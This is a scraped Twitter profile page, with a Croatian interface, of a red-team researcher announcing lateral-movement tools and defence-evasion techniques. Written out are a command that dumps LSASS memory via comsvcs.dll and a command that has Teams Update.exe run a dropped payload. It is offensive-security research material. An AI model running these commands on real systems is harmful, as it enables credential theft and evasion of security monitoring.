Mr.Un1k0d3r

@MrUn1k0d3r

I don't know how to search on Google so I do research on my own and tweet about it. Hacking as a life style

ringzer0ctf.com
Vrijeme pridruživanja: siječanj 2012.
19 fotografija ili videozapisa Fotografije i videozapisi

Tweetovi

Blokirali ste korisnika/cu @MrUn1k0d3r

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @MrUn1k0d3r

  1. 13. sij

    Released a little tool to perform lateral movement that hide the command you are executing by registering a protocol handler. The protocol handler is executed over WMI by simply running start customhandler:// ❤

    1 reply 236 proslijeđenih tweetova 533 korisnika označavaju da im se sviđa
    Poništi
  2. proslijedio/la je Tweet
    9. pro 2019.

    Trustwave Principal Consultant, , has announced the release of a new open source tool aimed at aiding Red Team engagements.

    1 reply 115 proslijeđenih tweetova 151 korisnik označava da mu se sviđa
    Poništi
  3. proslijedio/la je Tweet
    2. pro 2019.

    Evading WinDefender ATP credential-theft: a hit after a hit-and-miss start. tl;dr PssCaptureSnapshot syscall clones the process then you don't need to do ReadProcessMemory against the original process and avoid LSASS read detection.

    1 reply 86 proslijeđenih tweetova 186 korisnika označava da im se sviđa
    Poništi
  4. 19. stu 2019.

    SCShell now have a linux python utility that relies on impacket project. You can pass the hash too. Made a pull request to add it to the impacket project. ❤

    58 proslijeđenih tweetova 145 korisnika označava da im se sviđa
    Poništi
  5. 13. stu 2019.

    Interesting way to move laterally using the service manager without registering a service or writing a file to disk. C# and Powershell version will be release soon. Thanks to ChangeServiceConfigA ❤

    5 replies 351 proslijeđeni tweet 701 korisnik označava da mu se sviđa
    Poništi
  6. proslijedio/la je Tweet
    12. stu 2019.

    NTLM reflection is back to haunt windows. Read about Ghost Potato here (this time with a fixed link):

    15 replies 347 proslijeđenih tweetova 625 korisnika označava da im se sviđa
    Poništi
  7. 10. lis 2019.

    This is major step for me. My online now have a real identity. ❤

    Big thanks to the now have an official logo. T-shirt are coming soon ❤
    1 reply 1 proslijeđeni tweet 19 korisnika označava da im se sviđa
    Poništi
  8. 23. ruj 2019.

    More C# utility. WMI utility allow you to run WMI query directly in C#. Can be used with execute-assembly. ❤

    117 proslijeđenih tweetova 249 korisnika označava da im se sviđa
    Poništi
  9. 12. ruj 2019.

    Procdump alternative that may come handy during There is a C and a C# version that can be used with execute-assembly ❤

    172 proslijeđena tweeta 403 korisnika označavaju da im se sviđa
    Poništi
  10. proslijedio/la je Tweet
    8. ruj 2019.

    | Exe Sideloading aka Exe proxying attack technique, Most of the / applications affected, No need of installation. Medium : Youtube : Thanks to ,

    6 replies 55 proslijeđenih tweetova 141 korisnik označava da mu se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  11. proslijedio/la je Tweet
    4. ruj 2019.

    Without further delay, and I will now be releasing our Red Teamer's Guide to Pulse Secure SSL VPN.

    7 replies 249 proslijeđenih tweetova 541 korisnik označava da mu se sviđa
    Poništi
  12. proslijedio/la je Tweet
    30. kol 2019.

    MiniDumpWriteDump via COM+ Services DLL (rundll32 C:\windows\system32\comsvcs.dll MiniDump "[lsass_pid] dump.bin full")

    1 reply 141 proslijeđeni tweet 258 korisnika označava da im se sviđa
    Poništi
  13. 7. kol 2019.

    Come join me at 3PM at booth #1046 I will be presenting some interesting red team tricks that we are using during our red team engagements. See you soon ❤

    1 proslijeđeni tweet 27 korisnika označava da im se sviđa
    Poništi
  14. 1. kol 2019.

    LDAP utility written in C# that can be used with execute-assembly to query AD information. ❤

    110 proslijeđenih tweetova 250 korisnika označava da im se sviđa
    Poništi
  15. proslijedio/la je Tweet
    31. srp 2019.

    Introducing InveighZero, a C# LLMNR/NBNS/mDNS/DNS spoofer/man-in-the-middle tool: Bonus, also just released Inveigh 1.5: Stop by the booth to learn more and get stickers😃

    8 replies 362 proslijeđena tweeta 614 korisnika označava da im se sviđa
    Poništi
  16. 31. srp 2019.

    Apparently I will be in Las Vegas for my very first experience. I will be presenting some of my Red Team material at booth. Looking forward to meet some of you and 30000 billions grasshoppers. ❤

    48 korisnika označava da im se sviđa
    Poništi
  17. 11. srp 2019.

    I've slowly started to port some of my tools to C# so it can be used with Cobalt Strike execute-assembly or standalone executable. LDAP query to get Active Directory data for now.

    19 proslijeđenih tweetova 51 korisnik označava da mu se sviđa
    Poništi
  18. 8. srp 2019.

    Keep in mind that most electron app expose the Updater.exe since it is part of the electron ecosystem. Which means that popular app such as Slack and Discord can be used too.

    1 reply 1 proslijeđeni tweet 10 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  19. 8. srp 2019.

    My official blog post regarding Teams Updater arbitrary execution. More details on the mitigation already in place regarding Teams Updater. Also why using %appdata% is bad. Much love to ❤

    60 proslijeđenih tweetova 122 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  20. 26. lip 2019.

    Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\ Then %userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args" Trusted signed binary will run the payload for you 😊

    45 replies 1.486 proslijeđenih tweetova 3.429 korisnika označava da im se sviđa
    Poništi

@MrUn1k0d3r još nije objavio nijedan Tweet.

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·